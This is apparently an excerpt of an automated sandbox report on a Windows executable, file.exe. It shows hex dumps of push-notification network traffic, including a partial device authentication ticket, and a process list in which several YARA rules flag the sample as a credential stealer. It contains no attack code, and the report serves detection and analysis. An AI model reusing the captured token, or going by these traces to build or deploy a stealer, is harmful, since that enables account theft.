                                                                                                                                                                                    2024-11-29 18:50:35 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 58 4b 67 37 2f 30 4f 5a 55 30 43 34 6a 61 6b 46 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 34 39 38 36 63 66 31 63 32 39 62 66 61 30 38 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                    Data Ascii: BND 3 CON\WNS 0 197MS-CV: XKg7/0OZU0C4jakF.3Context: c4986cf1c29bfa08<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                    2024-11-29 18:50:35 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                    Data Ascii: 202 1 CON 58
                                                                                                                                                                                    2024-11-29 18:50:35 UTC58INData Raw: 4d 53 2d 43 56 3a 20 78 72 66 79 41 79 30 44 6c 45 4b 67 38 45 77 46 64 62 57 49 52 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                    Data Ascii: MS-CV: xrfyAy0DlEKg8EwFdbWIRQ.0Payload parsing failed.


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    81192.168.2.64989220.198.119.143443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:51:08 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 70 47 61 73 43 79 44 52 79 45 79 35 51 39 52 51 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 34 39 32 36 61 66 32 31 32 33 37 63 63 36 64 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: CNT 1 CON 305MS-CV: pGasCyDRyEy5Q9RQ.1Context: 64926af21237cc6d
                                                                                                                                                                                    2024-11-29 18:51:08 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                    Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                    2024-11-29 18:51:08 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 70 47 61 73 43 79 44 52 79 45 79 35 51 39 52 51 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 34 39 32 36 61 66 32 31 32 33 37 63 63 36 64 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 61 39 7a 2b 50 5a 4c 67 39 31 67 42 54 59 51 52 67 6c 6f 56 44 6d 62 79 38 54 4b 65 6d 74 74 79 32 6e 35 43 4a 35 63 2f 71 55 49 31 57 6a 4b 41 38 6f 43 33 58 49 77 50 53 51 47 62 42 47 4a 53 58 41 49 47 49 74 63 42 6f 63 7a 53 67 31 52 79 4b 31 49 62 50 2f 74 6a 62 30 50 6a 61 41 4f 76 4b 79 63 33 47 36 50 36 73 58 77 2f 47
                                                                                                                                                                                    Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: pGasCyDRyEy5Q9RQ.2Context: 64926af21237cc6d<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAa9z+PZLg91gBTYQRgloVDmby8TKemtty2n5CJ5c/qUI1WjKA8oC3XIwPSQGbBGJSXAIGItcBoczSg1RyK1IbP/tjb0PjaAOvKyc3G6P6sXw/G
                                                                                                                                                                                    2024-11-29 18:51:08 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 70 47 61 73 43 79 44 52 79 45 79 35 51 39 52 51 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 34 39 32 36 61 66 32 31 32 33 37 63 63 36 64 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                    Data Ascii: BND 3 CON\WNS 0 197MS-CV: pGasCyDRyEy5Q9RQ.3Context: 64926af21237cc6d<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                    2024-11-29 18:51:08 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                    Data Ascii: 202 1 CON 58
                                                                                                                                                                                    2024-11-29 18:51:08 UTC58INData Raw: 4d 53 2d 43 56 3a 20 36 48 58 31 32 67 45 61 66 45 47 44 70 6f 48 74 61 41 4a 6d 50 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                    Data Ascii: MS-CV: 6HX12gEafEGDpoHtaAJmPA.0Payload parsing failed.


                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                    Start time:13:49:03
                                                                                                                                                                                    Start date:29/11/2024
                                                                                                                                                                                    Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                    Imagebase:0x4f0000
                                                                                                                                                                                    File size:1'872'896 bytes
                                                                                                                                                                                    MD5 hash:90CA710AAF9DBEB26796E2023B2C20A4
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2244834702.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2197414052.0000000000E7A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2274068822.0000000000E83000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2271822071.0000000000E77000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2221046223.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2195972655.0000000000E7A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2247099968.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                    Start time:13:49:42
                                                                                                                                                                                    Start date:29/11/2024
                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                    Imagebase:0x7ff684c40000
                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                    MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                    Start time:13:49:43
                                                                                                                                                                                    Start date:29/11/2024
                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1888 --field-trial-handle=1616,i,1849646799519399230,5755203485963844661,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                    Imagebase:0x7ff684c40000
                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                    MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                    Start time:13:49:45
                                                                                                                                                                                    Start date:29/11/2024
                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                    Imagebase:0x7ff684c40000
                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                    MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                    Start time:13:49:45
                                                                                                                                                                                    Start date:29/11/2024
                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2060,i,10926334977255808972,13126981693382377171,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                    Imagebase:0x7ff684c40000
                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                    MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    No disassembly